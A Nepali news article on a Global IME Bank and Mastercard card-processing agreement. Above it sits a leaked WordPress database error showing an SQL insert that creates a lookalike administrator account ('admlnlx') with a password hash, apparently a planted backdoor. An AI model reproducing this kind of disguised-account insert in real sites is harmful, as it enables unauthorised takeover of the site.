WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfDw1Ov9gEkXP49ijcTU/Jv/244dSH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 06:20:57', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २५–
ग्लोबल आइएमई बैंक र मास्टर कार्ड बीच मास्टर कार्डको issuer र acquirer प्रशोधन सेवा पुर्याउने उद्धेश्यले सम्झौता भएको छ ।
सो सम्झौता पत्रमा ग्लोबल आइएमई बैंकका तर्फबाट बैंकका वरिष्ठ नायव प्रमुख कार्यकारी अधिकृत जनक शर्मा पौड्याल र मास्टर कार्डका तर्फबाट पेमेन्ट सलुसनस, साउथ एशियाका सिनियर बिजनेस लिडर नरेन्द्र नन्दलले हस्ताक्षर गर्नुभयो । मास्टर कार्डले यस प्रकारको सेवा पहिलो पल्ट नेपालमा ग्लोबल आइएमई बैंकलाई उपलब्ध गराउने भएको छ । जसबाट बैंकले आफ्ना ग्राहकहरुलाई अझ बढि सुरक्षित र छिटो भुक्तानी सुविधा प्रदान गर्ने छ ।
यस सम्झौता पश्चात मास्टर कार्डले ग्लोबल आइएमई बैंकलाई चाहिने सबै भुक्तानी नेटवर्कहरुलाई समर्थन गर्ने सेवा सुविधाहरु प्रदान गर्ने छ । यस साझेदारीबाट बैंकलाई डेविट, क्रेडिट र अन्य प्रकारका भुक्तानी कार्ड जारी गरी बजारमा क्यासलेस भुक्तानी प्रणली लागू गर्न मद्दत गर्ने छ ।
बैंकले ग्राहकहरुलाई सुरक्षित कार्ड सेवा प्रदान गर्नकोलागि नयाँ प्रविधिको चिप कार्ड पनि बजारमा ल्याई सकेको छ ।